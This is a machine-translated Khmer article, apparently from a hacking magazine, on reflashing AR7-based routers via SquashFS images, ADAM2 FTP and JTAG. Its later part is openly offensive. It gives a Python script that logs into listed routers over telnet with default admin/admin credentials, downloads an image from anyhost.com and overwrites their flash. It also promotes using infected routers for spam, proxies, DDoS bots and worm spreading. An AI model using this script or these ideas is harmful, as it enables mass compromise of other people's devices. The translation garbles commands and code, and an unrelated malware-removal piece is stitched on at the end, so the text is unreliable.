សំណួរជាច្រើននឹងត្រូវបានសួរអំពីការបើកការគាំទ្រឧបករណ៍ (ប្រសើរជាង
ឆ្លើយពួកគេនៅក្នុងការបញ្ជាក់) ។ នៅចុងបញ្ចប់នៃការចងក្រងនៅក្នុងថតឯកសារ TYLinuxV3/រូបភាព
រូបភាពកម្មវិធីបង្កប់នឹងត្រូវបានបង្កើត។ អ្នកក៏អាចដំណើរការស្គ្រីបដែលមានឈ្មោះដូចគ្នាទៅនឹងរបស់អ្នកផងដែរ។
គំរូពីថត /TYLinuxV3/src/scripts ។

ពាក្យពីរបីអំពីការផ្ទេរឯកសាររវាងរ៉ោតទ័រ និងកុំព្យូទ័រ។ ដំបូងបំផុត។
វិធីសាស្រ្តដែលខ្ញុំបានប្រើគឺសមត្ថភាពក្នុងការផ្ទេរឯកសារដោយប្រើពិធីការ SSH,
ដោយប្រើកម្មវិធី scp សម្រាប់ការនេះ។ ប៉ុន្តែបន្តិចក្រោយមក ខ្ញុំបានរកឃើញថា mc (ពាក់កណ្តាលអធ្រាត្រ
Commander) ក៏មានសមត្ថភាពភ្ជាប់តាមរយៈ SSH (Panel -> Shell connection) ។
ម៉្យាងទៀត អ្នកអាចដំឡើង Web ឬ FTP server នៅកន្លែងធ្វើការរបស់អ្នក។ ក្រោយមក I
បានផ្តល់ចំណូលចិត្តដល់ Web-server ព្រោះវាដំណើរការលឿនបំផុត។ ខ្ញុំបានដំឡើង
thttpd តូច និងលឿន ដូចជានៅលើរ៉ោតទ័រ។ យើងចាប់ផ្តើមនៅផ្ទះហើយទាញ
ឯកសាររ៉ោតទ័របន្ទាប់ពីចូលទៅកាន់ថត /var (វាដូចដែលបានរៀបរាប់
ពីមុនអាចថតបាន)។

$ thttpd -g -d ~/ForRouter -u អ្នកប្រើប្រាស់ -p 8080
# ស៊ីឌី / var
# wget http://192.168.1.2/file

ដើម្បីទាញយកឯកសារពីរ៉ោតទ័រ អ្នកក៏អាចដំឡើងបណ្តាញម៉ាស៊ីនមេ៖

# thttpd -g -d /var -u root -p 8080

យកចិត្តទុកដាក់ ប្រសិនបើអ្នកចង់ទាញយកឯកសារដែលអាចប្រតិបត្តិបានពីរ៉ោតទ័រ អ្នកគួរតែ
ដកសិទ្ធិបើកដំណើរការ។ នៅពេលទាញយកឯកសារមួយចំនួនធំពីរ៉ោតទ័រ
វាជាការប្រសើរក្នុងការប្រើ mc អ្នកនឹងមិនចាំបាច់ចម្លងឯកសារទៅ /var ជាមុននិង
ដកសិទ្ធិចេញ ហើយបន្ទាប់មកលុបឯកសារទាំងនេះ ដើម្បីបង្កើនទំហំផ្ទុក។ ជាទូទៅបញ្ហា
រសជាតិ, ជ្រើសរើសជម្រើសណាមួយដែលងាយស្រួលសម្រាប់អ្នក។

ការបង្កើតកម្មវិធីផ្ទាល់ខ្លួនរបស់អ្នក។

សូមចាប់ផ្តើមជាមួយនឹងភាពបុរាណនៃការសរសេរកម្មវិធី - HelloWorld ។ ពិសេសខ្លះ
មិនមានច្បាប់ទេ។ អត្ថបទនៃកម្មវិធីគឺស្គាល់ឈឺចាប់៖

# រួមបញ្ចូល
# រួមបញ្ចូល

int main(ទុកជាមោឃៈ)
{
printf("Mate.Feed.Kill.Repeat");
ត្រឡប់ 0;
}

យើងចងក្រង (ផ្លូវទៅកាន់ toolchain " ហើយត្រូវតែបញ្ជាក់នៅក្នុងអថេរបរិស្ថាន
ផ្លូវ)៖

$ mips_fp_le-gcc hell.c -o នរក
$ mips_fp_le-strip -s នរក

# ស៊ីឌី / var
# chmod +x នរក
#./នរក

ហើយ ... គ្មានអ្វីនឹងកើតឡើង ឬផ្លូវដែលរកមិនឃើញការជូនដំណឹងនឹងធ្លាក់ចេញ។ តើអ្វីជា
ករណី? ខ្ញុំបាននិយាយរួចហើយអំពី cm_pc មុននេះ - កម្មវិធីនេះបើកដំណើរការអ្នកផ្សេង
យោងតាមច្បាប់ដែលបានពិពណ៌នានៅក្នុង /etc/progdefs.xml ។ ពេល​នេះ​មក​ដល់
កែប្រែ និងបញ្ចេញរូបភាពប្រព័ន្ធឯកសារ។

ការកែប្រែប្រព័ន្ធឯកសារ

ដើម្បីកែប្រែប្រព័ន្ធឯកសារ ដំបូងអ្នកត្រូវធ្វើ
ស្រាយកញ្ចប់។ ដូចដែលខ្ញុំបានលើកឡើង ប្រព័ន្ធឯកសារនៅទីនេះគឺ SquashFs ជាមួយនឹងបំណះ LZMA ។
កញ្ចប់អភិវឌ្ឍន៍កម្មវិធីបង្កប់រួមបញ្ចូលតែកម្មវិធី mksquashfs (សម្រាប់បង្កើត
រូបភាព), unsquashfs (សម្រាប់ការពន្លា) ត្រូវបានបាត់។ ប៉ុន្តែវាមិនមានបញ្ហាអ្វីទាំងអស់គឺអាចប្រើបាន
នៅលើគេហទំព័រប្រព័ន្ធឯកសារ យើងត្រូវការកំណែដំបូង។ ដោយអនុវត្តបំណះ LZMA និង
ដោយបានប្រមូលឧបករណ៍ប្រើប្រាស់រួច យើងដាក់វាឡែកនៅកន្លែងងាយស្រួល ដំបូងយើងទទួលបានរូបភាព
ប្រព័ន្ធឯកសារពីរ៉ោតទ័រ៖

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs

ឥឡូវនេះអ្នកអាចកែប្រែតាមចិត្តបាន ប៉ុន្តែយើងចង់បោះ FuckTheWorld ចូលទៅក្នុង
ថត /bin ហើយបន្ថែមច្បាប់ដើម្បីដំណើរការក្នុង /etc/progdefs.xml ។

$ cp ជំរាបសួរ unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

ហើយបន្ថែមវា (រវាងស្លាក ):

នរក
/bin/ឋាននរក

រក្សា​ទុក​និង​ខ្ចប់​ត្រឡប់​មក​វិញ​:

$ mksquashfs unpacked_fs my_fs.img -noappend

ចំណាំថារូបភាពប្រព័ន្ធឯកសារមិនត្រូវលើសពី
ទំហំដែលអាចអនុញ្ញាតបាន។ ប្រសិនបើអ្នកមានអារម្មណ៍ថាចង់ព្យាយាមអ្វីមួយជាបន្ទាន់ ហើយវាមិនមែនទេ។
សម, ដកចេញពីរូបភាពអ្វីមួយដែល "មិនចាំបាច់" ដូចជា grep, whoami, ឬ
ប្រើឧបករណ៍វេចខ្ចប់ដែលអាចប្រតិបត្តិបាន UPX ។ ឥឡូវ​នេះ​បង្ហោះ​ទៅ​រ៉ោតទ័រ
រូបភាព ហើយបន្តទៅផ្នែកបន្ទាប់។

ការចាប់យករូបភាពប្រព័ន្ធឯកសារ

វិធីដើម្បីបញ្ចេញពន្លឺរ៉ោតទ័រគឺសាមញ្ញណាស់វាមាននៅក្នុងការចូលប្រើឧបករណ៍
/dev/mtdblock/* ។ ដូច្នេះ ផ្ទុករូបភាពឯកសារទៅរ៉ោតទ័រតាមមធ្យោបាយងាយស្រួលណាមួយ។
ប្រព័ន្ធ និងអនុវត្តសកម្មភាពសាមញ្ញនេះ៖

# cat my_fs.img > /dev/mtdblock/0 && ចាប់ផ្ដើមឡើងវិញ

# cp my_fs.img /dev/mtdblock/0 && ចាប់ផ្ដើមឡើងវិញ

មួយសន្ទុះក្រោយមក នៅពេលដែលដំណើរការថតចប់ រ៉ោតទ័រនឹងចាប់ផ្ដើមឡើងវិញ
ការផ្លាស់ប្តូរនឹងមានប្រសិទ្ធភាព។ តោះព្យាយាមដំណើរការឧទាហរណ៍របស់យើង៖

#នរក
Mate.Feed.Kill.Repeat.

វិធីស្តារឡើងវិញក្នុងករណីបរាជ័យ

មុនពេលបញ្ចេញពន្លឺរ៉ោតទ័រជាមួយនឹង "សិប្បកម្ម" ធ្ងន់ធ្ងរជាងនេះអ្នកគួរតែរៀនពីរបៀប
ធ្វើសកម្មភាពក្នុងករណីធ្ងន់ធ្ងរនៅពេលដែលរ៉ោតទ័របដិសេធ
ផ្ទុក។ មិនមានស្ថានភាពអស់សង្ឃឹមទេ។ ម៉ាស៊ីនមេ ADAM2 FTP មកជួយសង្គ្រោះ។ សម្រាប់
ដំបូងអ្នកត្រូវដំណើរការម៉ាស៊ីនភ្ញៀវ FTP នៅលើអាសយដ្ឋាន IP របស់ ADAM2 ដែលអាចត្រូវបាន peeped
នៅក្នុង /proc/ticfg/env (ប៉ារ៉ាម៉ែត្រ my_ipaddress) ។

$ ftp 192.168.1.199
220 ADAM2 FTP Server រួចរាល់ហើយ។
530 សូមចូលដោយប្រើ USER និង PASS ។

ដើម្បីភាពច្បាស់លាស់ អ្នកអាចបើករបៀបបំបាត់កំហុស បន្ទាប់មកទាំងអស់។
ព័ត៌មាន និងការឆ្លើយតប FTP ទាំងអស់៖

ចូល / ពាក្យសម្ងាត់ - adam2 / adam2 ។ ដំណើរការនៃការបញ្ចេញពន្លឺគឺសាមញ្ញណាស់។ ចាប់ផ្ដើម
ផ្លាស់ប្តូរសម័យ FTP ទៅជារបៀបគោលពីរ៖

ftp> សម្រង់ MEDIA FLSH

ឥឡូវនេះយើងផ្ញើឧទាហរណ៍រូបភាពនៃប្រព័ន្ធឯកសារនិងបញ្ជាក់ទីតាំង
គោលដៅ៖

ftp> ដាក់ fs.img "fs.img mtd0"

យើងកំពុងរង់ចាំការបញ្ចប់នៃការថត ចាប់ផ្ដើមរ៉ោតទ័រឡើងវិញ ចេញពីវគ្គ៖

ftp> សម្រង់ REBOOT
ftp> ចេញ

ទាំងអស់! ដូចដែលអ្នកអាចឃើញមិនមានអ្វីពិបាកទេឥឡូវនេះប្រសិនបើមានអ្វីមួយខុសអ្នក។
អ្នកតែងតែអាចធ្វើអ្វីៗបានត្រឹមត្រូវ។

ដើម្បីភាពងាយស្រួល អ្នកគួរតែផ្តល់អាសយដ្ឋាន IP ធម្មតា បើកដំណើរការ
ការទាញយកដោយស្វ័យប្រវត្តិ (ដូច្នេះជាការមិនឱ្យរាំជាមួយនឹងការកំណត់ឡើងវិញ) និងបង្កើនពេលវេលាបន្តិច
រង់ចាំការតភ្ជាប់មុនពេលផ្ទុកខឺណែល។ ការកំណត់ទាំងអស់នេះត្រូវបានរក្សាទុកនៅក្នុង
អថេរបរិស្ថាន មានពាក្យបញ្ជា ADAM2 FTP ពិសេស៖ GETENV និង SETENV (សម្រាប់
ទទួលបាន និងកំណត់អថេររៀងៗខ្លួន)។ នៅក្នុងវគ្គ FTP សូមបញ្ចូលដូចខាងក្រោម
ពាក្យបញ្ជា៖

ftp> SETENV ផ្ទុកដោយស្វ័យប្រវត្តិ, ១
ftp> SETENV autoload_timeout, ៨
ftp> SETENV my_ipaddress,192.168.1.1
ftp> សម្រង់ REBOOT
ftp> ចេញ

រ៉ោតទ័រចាប់ផ្ដើមឡើងវិញ ហើយអ្នកអាចចូលទៅកាន់ ADAM2 នៅ 192.168.1.1:21។ ប្រសិនបើ ក
វា​នឹង​មាន​បំណង​ចង់​បង្ហាញ​រូបភាព​ខឺណែល​ឡើងវិញ ហើយ​ខឺណែល​នឹង​បដិសេធ​ក្នុង​ការ​ចាប់ផ្ដើម FTP
នឹងចាប់ផ្តើមដោយខ្លួនឯង។ មុនពេលបញ្ចេញពន្លឺជាមួយនឹងរូបភាពដែលបានកែប្រែ ត្រូវប្រាកដថា
រក្សាទុកបច្ចុប្បន្នសម្រាប់ការងើបឡើងវិញ។ ជាទូទៅ អ្នកអាចផ្លាស់ប្តូរអថេរបរិស្ថាន
និងតាមរយៈ /proc/ticfg/env ខ្ញុំគ្រាន់តែចង់និយាយបន្ថែមអំពីការធ្វើការជាមួយ FTP ។

# បន្ទរ my_ipaddress 192.168.1.1 > proc/ticfg/env

ហើយអ្នកអាចពិនិត្យមើលការផ្លាស់ប្តូរដូចនេះ៖

# cat /proc/ticfg/env | grep my_ipaddress

អ្វីដែលត្រូវធ្វើប្រសិនបើអ្នកចង់សាកល្បង flash bootloader និងរបៀប
ធ្វើសកម្មភាពក្នុងករណីបរាជ័យ? ឬរ៉ោតទ័រសម្រាប់ហេតុផលមួយចំនួនមិនចាប់ផ្តើម, និង
គ្មានសិទ្ធិចូលប្រើ ADAM2? មានផ្លូវចេញ - JTAG ឬផ្ទុយទៅវិញ EJTAG មានវត្តមាននៅក្នុងបន្ទះឈីបនេះ។
(កំណែបន្ថែម) ។ នេះគឺជាចំណុចប្រទាក់សម្រាប់ការបំបាត់កំហុសក្នុងសៀគ្វី / ការសរសេរកម្មវិធី។

ដើម្បីភ្ជាប់ទៅចំណុចប្រទាក់នេះ យើងត្រូវការច្រក LPT របស់កុំព្យូទ័រ។
ឧបករណ៍ភ្ជាប់និង 4 resistors ។ គ្រោងការណ៍គឺសាមញ្ញ។

ខ្ញុំប្រញាប់ចំណាំថាកម្មវិធីបង្កប់តាមរយៈ JTAG មិនមែនជាអាជីវកម្មលឿនទេ វានឹងចំណាយពេលគ្រប់គ្រាន់
ពេលវេលាច្រើន។ ដូច្នេះវាគួរតែប្រើដើម្បីស្ដារកម្មវិធីចាប់ផ្ដើមប្រព័ន្ធឡើងវិញតែប៉ុណ្ណោះ។
ទោះបីជាវាមិនដំណើរការក៏ដោយ។ ដើម្បីទំនាក់ទំនងតាមរយៈ JTAG អ្នកគួរតែប្រើពិសេស
កម្មវិធីដូចជា UrJTAG ។ ខាងក្រោម​នេះ​ជា​ឧទាហរណ៍​នៃ​របៀប​ដែល​ចំណុចប្រទាក់​នេះ​ដំណើរការ។
ការរៀបចំទំនាក់ទំនង៖

jtag> ខ្សែប៉ារ៉ាឡែល 0x378 DLC5
jtag> រកឃើញ

ការរកឃើញអង្គចងចាំពន្លឺ៖

jtag> detectflash 0x30000000 ១

ការអានអង្គចងចាំ Flash៖

jtag> readmem 0x30000000 0x400000 fullflash.img

សរសេរទៅអង្គចងចាំ (កម្មវិធីចាប់ផ្ដើមប្រព័ន្ធ)៖

jtag> flashmem 0x30000000 adam2.img

វាក៏មានប្រយោជន៍ផងដែរក្នុងការដឹងអំពីចំណុចប្រទាក់ UART (ខ្ញុំបានសន្យាថានឹងនិយាយអំពីវាពីមុន) ។ អេ
UART_A រាយការណ៍ នោះគឺជាកំណត់ហេតុកម្មវិធីចាប់ផ្ដើមប្រព័ន្ធ (នៅដំណាក់កាលដំបូងនៃការចាប់ផ្ដើមពី
អ្នកអាចនិយាយជាមួយគាត់) និងស្នូល។ នៅពេលសរសេរខឺណែលដែលបានកែប្រែ
មិនអាចខ្វះបានសម្រាប់ការបំបាត់កំហុស។ UART - អ្នកទទួល/បញ្ជូនអសមកាលជាសកល
(ឧបករណ៍បញ្ជូនអសមកាលជាសកល) តែងតែមានវត្តមាននៅលើ
ឧបករណ៍បញ្ជាមីក្រូ។

សៀគ្វីអាដាប់ទ័រគឺសាមញ្ញណាស់។ ផ្អែកលើបន្ទះឈីបតែមួយ -
កម្មវិធីបម្លែងកម្រិត TTL៖ MAX232 សម្រាប់ COM និង FT232R សម្រាប់ USB ។ មីក្រូសៀគ្វី
គឺជារឿងធម្មតា ហើយនឹងមិនមានបញ្ហាជាមួយនឹងការទិញនោះទេ។

សៀគ្វីត្រូវបានផ្គុំនៅលើក្តារបន្ទះ (ដែលអាចដាក់ដោយសុវត្ថិភាពក្នុងករណី
ឧបករណ៍ភ្ជាប់ច្រក COM) ក្នុងរយៈពេល 20 នាទីហើយនាំមកនូវអត្ថប្រយោជន៍ជាច្រើន។ ឧទាហរណ៍នៅពេលបំបាត់កំហុស
ខឺណែលគឺជាដំណោះស្រាយដែលមិនអាចខ្វះបានយ៉ាងពិតប្រាកដ។ ហើយប្រសិនបើអេឡិចត្រូនិចតឹង? ចេញ
គឺជាខ្សែ USB សម្រាប់ទូរស័ព្ទចាស់ៗ ពួកគេគ្រាន់តែមានឧបករណ៍បំប្លែងប៉ុណ្ណោះ។
UART - USB ។

គំនិតចែកចាយមួយចំនួន

ប្រូកស៊ី/ស្រោមជើងរបស់អ្នកនៅលើរ៉ោតទ័ររបស់នរណាម្នាក់គឺល្អណាស់។ ជាការពិត ការផ្ញើសារឥតបានការ
លើរ៉ោតទ័រពិធីការទាំងអស់។ នេះមិនមែនជាកុំព្យូទ័រ Windows សម្រាប់អ្នកទេ។
រៀបចំឡើងវិញរាល់ខែ :) រ៉ោតទ័រជារឿយៗមិនផ្លាស់ប្តូរ ឬបញ្ចេញឡើងវិញទេ។ បាទ និង
ក្រៅពីពួកយើង តើអ្នកណានឹងបង្កើតគំនិតនៃការឆ្លងរ៉ោតទ័រ?

កុំភ្លេច យើងគ្រប់គ្រងចរាចរណ៍ទាំងអស់ពីអ្នកប្រើប្រាស់/បណ្តាញ។ សម្រាប់ច្រើនទៀត
Router ដ៏មានថាមពល ហើយវាអាចព្យួរ DDOS bot រួចហើយ។ ដំណើរការលាក់ឯកសារ/លាក់,
ស្ទាក់ចាប់ការសរសេរទៅប្លុក mtd ដោយលុបបំបាត់ការលុបកម្មវិធីរបស់យើង - អ្វីគ្រប់យ៉ាងដែល
ស្អី​ក៏ដោយ!

ចូរនិយាយថាអ្នកនឹងចាប់ផ្តើមសរសេរកម្មវិធីធ្ងន់ធ្ងរសម្រាប់រ៉ោតទ័រ។
ការកែកំហុសល្អណាស់គឺសំខាន់ អ្នកប្រហែលជាត្រូវធ្វើច្រើនដង
សរសេរ/ស្តាររូបភាពឡើងវិញ... នេះគឺជាការរំពឹងទុកដ៏ក្រៀមក្រំណាស់។ សូម្បីតែដៃ
ទាបជាងបន្តិច ប្រសិនបើយើងយកទៅក្នុងគណនីផងដែរថា ធនធានសរសេរឡើងវិញនៃអង្គចងចាំ Flash
តូច (ព័ត៌មានលម្អិតបន្ថែមនៅក្នុងឯកសារសម្រាប់បន្ទះឈីបអង្គចងចាំ) ហើយមានការរំពឹងទុក
បោះចោលនាង។ ប៉ុន្តែមានផ្លូវចេញ! Qemu អាចត្រាប់តាម AR7! តើអ្នកអាចស្រមៃពីអ្វី
តើវាផ្តល់ឱកាស និងភាពងាយស្រួលគ្មានដែនកំណត់ទេ? ឥឡូវនេះគ្មានអ្វីអាចបញ្ឈប់យើងបានទេ។
សរសេរ​អ្វី​មិន​គួរ​ឱ្យ​ជឿ!

ដូច្នេះ។ អ្នកបានសរសេរកម្មវិធីមួយ ពិនិត្យវាដោយខ្លួនឯង ឬ 1-2 រ៉ោតទ័ររបស់អ្នកផ្សេងទៀត ប៉ុន្តែ
បណ្តាញទាំងមូលនៅតែនាំមុខ ការឆ្លងដោយដៃគឺជាការងារមួយ នៅលើរ៉ោតទ័រទី 10 អ្នកកំពុងចាប់ផ្តើមរួចហើយ
ដាក់បណ្តាសាពិភពលោកទាំងមូលហើយអណ្តែតក្នុងភ្នែកពីខ្សែអក្សរ "ឆ្មា" និង "mtd" ។ ចូរយើងសរសេរ
កម្មវិធីដើម្បីធ្វើឱ្យសកម្មភាពទម្លាប់ទាំងនេះដោយស្វ័យប្រវត្តិ។ ខ្ញុំបានជ្រើសរើសភាសា python ។

ផែនការការងារគឺ៖

  • ការចងក្រងបញ្ជីរ៉ោតទ័រឧទាហរណ៍ដោយប្រើ nmap;
  • ស្គ្រីបគួរតែយកអាសយដ្ឋាន IP ពីបញ្ជីតាមលំដាប់ បញ្ចូលតាមរយៈ
    telnet ជាមួយនឹងការចូល / ពាក្យសម្ងាត់ស្តង់ដារ;
  • បន្ទាប់មកសកម្មភាពដូចគ្នា៖ បង្ហោះរូបភាពដែលបានកែប្រែ
    សរសេរជាន់លើ, ចាប់ផ្ដើមឡើងវិញ។

#!/usr/bin/env python
# អ៊ិនកូដ = UTF-8

នាំចូល telnetlib, ពេលវេលា

SERVER="http://anyhost.com/fs.image"

សម្រាប់ addr នៅក្នុង open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("ចូល:")
ពេលវេលាគេង (5)
telnet.write("admin\n")
telnet.read_until("ពាក្យសម្ងាត់:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("ចាប់ផ្តើមឡើងវិញ")
telnet.close()

តក្កវិជ្ជានៃស្គ្រីបគឺនៅឆ្ងាយពីឧត្តមគតិ ឥឡូវនេះខ្ញុំនឹងពន្យល់ពីមូលហេតុ។ សម្រាប់
ដំបូងអ្នកគួរតែពិនិត្យមើលកំណែកម្មវិធីបង្កប់/ខឺណែល និងម៉ូដែលរ៉ោតទ័រ ព្រោះអាចមាន
ភាពខុសគ្នាសំខាន់ក្នុងការអនុវត្ត។ លើសពីនេះ ជំនួសឱ្យកម្មវិធីបង្កប់ទទេ អ្នកគួរតែទាញយក
រូបភាពប្រព័ន្ធឯកសារពីរ៉ោតទ័រ ពន្លា កែប្រែ និងផ្ញើ
ត្រឡប់មកវិញ។ នេះនឹងលុបបំបាត់បញ្ហានៃភាពឆបគ្នាជាមួយនឹងភាពខុសគ្នា
ម៉ូដែល/កំណែកម្មវិធីបង្កប់ ពីព្រោះស្ថេរភាពនៃការងារគឺជារឿងសំខាន់បំផុតសម្រាប់អ្នក។
ម្យ៉ាងទៀត មេរោគ​អាច​មាន​មុខងារ​របស់​ដង្កូវ ហើយ​ប្រសិនបើ​អ្នក​ប្រាថ្នា អ្នក​អាច​ធ្វើ​បាន​ជានិច្ច
ភ្ជាប់ម៉ាស៊ីនស្កេនបណ្តាញទៅវា កម្លាំងអាក្រក់សម្រាប់ RDP និងបន្ទះសៀគ្វីស្រដៀងគ្នា។

មានវិធីសាស្រ្តចែកចាយដ៏អស្ចារ្យមួយទៀត។ គ្មានអ្វីរារាំងអ្នកពីការសរសេរទេ។
កម្មវិធីសម្រាប់ Windows ដែលនឹងមានជាមួយអ្នក (ឬទាញយកពីរបស់អ្នក។
server) រូបភាពនៃប្រព័ន្ធឯកសារ និងឆ្លងរ៉ោតទ័រជាមួយវា ប្រសិនបើវាមានវត្តមាន។
ចែកចាយកម្មវិធីនេះតាមវិធី "ស្តង់ដារ" ទាំងអស់៖ ដ្រាយចល័ត។
ការកេងប្រវ័ញ្ចសម្រាប់កម្មវិធី ការឆ្លងនៃកម្មវិធីផ្សេងៗ... ការរួមបញ្ចូលគ្នានៃវិធីសាស្រ្តទាំងនេះ,
អាចជាជំងឺរាតត្បាតធំ។ គ្រាន់តែស្រមៃមើលរូបភាពនេះ។
ឧបករណ៍បែបនេះមានគ្រប់ទីកន្លែង។

ការការពាររ៉ោតទ័រ

បន្ទាប់​ពី​បាន​ជីក​កកាយ​អស់​ហើយ ខ្ញុំ​គិត​ថា តើ​ខ្ញុំ​អាច​ការពារ​រ៉ោតទ័រ​ដោយ​របៀប​ណា? ហើយបន្ទាប់មកអ្នកឃើញ,
ខ្ញុំនឹងទទួលបានខ្លួនឯង។ ជំហាន​ដំបូង​គឺ​ត្រូវ​ផ្លាស់​ប្តូ​រ​ពាក្យ​សម្ងាត់​អ្នក​ប្រើ​ឱ្យ​កាន់​តែ​ស្មុគស្មាញ​និង​
វែង (កំណត់ - 8 តួអក្សរ) ផ្លាស់ប្តូរបដា និងសេវាកម្មស្វាគមន៍
(ជាមួយកម្មវិធីនិពន្ធគោលដប់ប្រាំមួយ, ឬ, និយម, ចងក្រងកម្មវិធីឡើងវិញ) ដើម្បី
nmap ឬម៉ាស៊ីនស្កេនផ្សេងទៀតមិនអាចកំណត់កំណែរបស់សេវាកម្មបានទេ។

អ្នកក៏គួរតែផ្លាស់ប្តូរច្រកដែលបិសាចព្យួរផងដែរ។ នេះត្រូវបានធ្វើតាមរយៈ
ការកែប្រែទៅ progdefs.xml ។ សម្លាប់ telnet (វិធីងាយស្រួលបំផុតដើម្បីយកពាក្យសម្ងាត់សម្រាប់វា បាទ
ហើយពិធីការគឺមិនមានសុវត្ថិភាព ហេតុអ្វីបានជាយើងត្រូវការវា) បើកជញ្ជាំងភ្លើង អនុញ្ញាតឱ្យមានការតភ្ជាប់
ទៅកាន់សេវាកម្មតែពីអាសយដ្ឋាន IP ឬ MAC របស់វាប៉ុណ្ណោះ។ ប្រើជញ្ជាំងភ្លើងផងដែរ។
ដើម្បីការពារបណ្តាញ ឬកុំព្យូទ័រ វាមិនឥតប្រយោជន៍ទេដែលវាមានវត្តមាន។ ការកំណត់មានសមត្ថកិច្ច
ច្បាប់នឹងជួយការពារជានិច្ច។

សេចក្តីសន្និដ្ឋាន

មនុស្សជាច្រើន មិនត្រឹមតែ Router D-Link និងឧបករណ៍ស្រដៀងគ្នាផ្សេងទៀតប៉ុណ្ណោះដែលត្រូវបានបង្កើតឡើង
បន្ទះឈីប AR7 បញ្ជីរួមមាន Acorp, NetGear, Linksys, Actionec... ស្អាតណាស់
AR7 នេះមានប្រជាប្រិយភាពរួមជាមួយ MontaVista ។ វាធ្វើតាមនោះដោយប្រើដូចគ្នា។
toolchain ដោយគ្មានបញ្ហា អ្នកអាចអនុវត្តជំហានដែលបានពិពណ៌នានៅក្នុងអត្ថបទ។

គិតអំពីវា៖ បន្ថែមពីលើសកម្មភាពបង្កគ្រោះថ្នាក់ អ្នកក៏អាចធ្វើអ្វីដែលមានប្រយោជន៍ / រីករាយសម្រាប់ខ្លួនអ្នកផងដែរ។
និងអ្នកផ្សេងទៀត (ខ្ញុំមិនប្រកែកទេ សេចក្តីរីករាយនៃការលួចចូលមិនអាចជំនួសបាន ប៉ុន្តែនៅតែមាន)។
អ្នកអាចបង្កើតកម្មវិធីបង្កប់ផ្ទាល់ខ្លួនរបស់អ្នក ឧទាហរណ៍ រ៉ោតទ័រដែលមានថាមពលខ្លាំងជាងដែលមានសមត្ថភាព
ទាញយក/ចែកចាយ torrents ... ម៉ូដែលទាំងអស់មានចំណុចប្រទាក់ USB 1.1 ប៉ុន្តែនៅក្មេង
ម៉ូដែលដែលវាមិនត្រូវបានលក់។ បន្ថែមម៉ូឌុល USB និងកម្មវិធីបញ្ជាប្រព័ន្ធឯកសារទៅខឺណែល
បំពាក់រ៉ោតទ័រជាមួយនឹងអង្គចងចាំពន្លឺ - ហើយជាលទ្ធផលអ្នកទទួលបានប្រភេទនៃការផ្ទុកបណ្តាញសម្រាប់
លុយតិចតួច។ មានជម្រើសជាច្រើន ហើយគំនិតគួរកើតឡើងរាប់ពាន់នាក់ មិនមែនទេ។
កំណត់ខ្លួនឯង បង្កើត និងបង្កើត!

ដោយសារការកើនឡើងនៃករណីនៃការក្លែងបន្លំ DNS ដោយមេរោគនៅលើឧបករណ៍របស់អ្នកប្រើប្រាស់អ៊ីនធឺណិត សំណួរអំពីសុវត្ថិភាពនៃរ៉ោតទ័រ Wi-Fi កើតឡើង។ របៀបពិនិត្យរ៉ោតទ័ររកមេរោគ? វិធីកម្ចាត់មេរោគនៅក្នុងរ៉ោតទ័រ? សំណួរគឺស្មុគស្មាញ និងសាមញ្ញក្នុងពេលតែមួយ។ មានដំណោះស្រាយ!


មេរោគខ្លួនវាមិនអាចសរសេរខ្លួនវាទៅកាន់ Router ទំនើបភាគច្រើនបានទេ ដោយសារទំហំតូចនៅក្នុងអង្គចងចាំរបស់ Router ប៉ុន្តែវាអាចធ្វើឱ្យ Router zombify ដើម្បីចូលរួមក្នុង botnet ។ តាមក្បួននេះគឺជា botnet ដើម្បីវាយប្រហារ servers ផ្សេងៗ ឬដើម្បីប្តូរទិស និងវិភាគលំហូរនៃព័ត៌មានដែលទុកអ្នកនៅលើអ៊ីនធឺណិត។

ពាក្យសម្ងាត់ និងការឆ្លើយឆ្លងផ្ទាល់ខ្លួនរបស់អ្នកអាចធ្លាក់ចូលទៅក្នុងដៃអ្នកឈ្លានពាន!

នេះចាំបាច់ត្រូវកែតម្រូវឱ្យបានឆាប់តាមដែលអាចធ្វើទៅបាន។

  • កំណត់ការកំណត់រ៉ោតទ័រឡើងវិញ
  • កម្មវិធីបង្កប់រ៉ោតទ័រ
  • ការកំណត់រចនាសម្ព័ន្ធឡើងវិញ

កំណត់ការកំណត់រ៉ោតទ័រឡើងវិញ

អ្នកអាចកំណត់ការកំណត់រ៉ោតទ័រឡើងវិញដោយចុចប៊ូតុងកំណត់ឡើងវិញ។ ជាធម្មតា ប៊ូតុងនេះមានទីតាំងនៅខាងក្រោយរ៉ោតទ័រ ដែលជាកន្លែងច្រក LAN ។ ជាធម្មតា ប៊ូតុងត្រូវបានបិទចូលទៅក្នុងរន្ធ ដើម្បីជៀសវាងការចុចដោយចៃដន្យ ដូច្នេះអ្នកត្រូវប្រើឈើចាក់ធ្មេញ។ នេះ​គឺជា នឹងលុបការកំណត់រ៉ោតទ័រដែលបានផ្លាស់ប្តូរដោយមេរោគ ហើយដំឡើងរោងចក្រនៅកន្លែងរបស់វា។ ខ្ញុំត្រូវតែព្រមានអ្នកថាប្រសិនបើអ្នកមិនដឹងពីរបៀបកំណត់រចនាសម្ព័ន្ធរ៉ោតទ័រទេបន្ទាប់មក បោះចោលការកំណត់របស់វាសម្រាប់អ្នក មិនមានតម្លៃទេ។!

កម្មវិធីបង្កប់រ៉ោតទ័រ

ជួនកាលមេរោគ "ទឹកជំនន់" កម្មវិធីបង្កប់ដែលបានកែប្រែទៅរ៉ោតទ័រ។ អ្នកអាចលុបកម្មវិធីបង្កប់មេរោគចេញពីរ៉ោតទ័រដោយបើករ៉ោតទ័រម្តងទៀត។

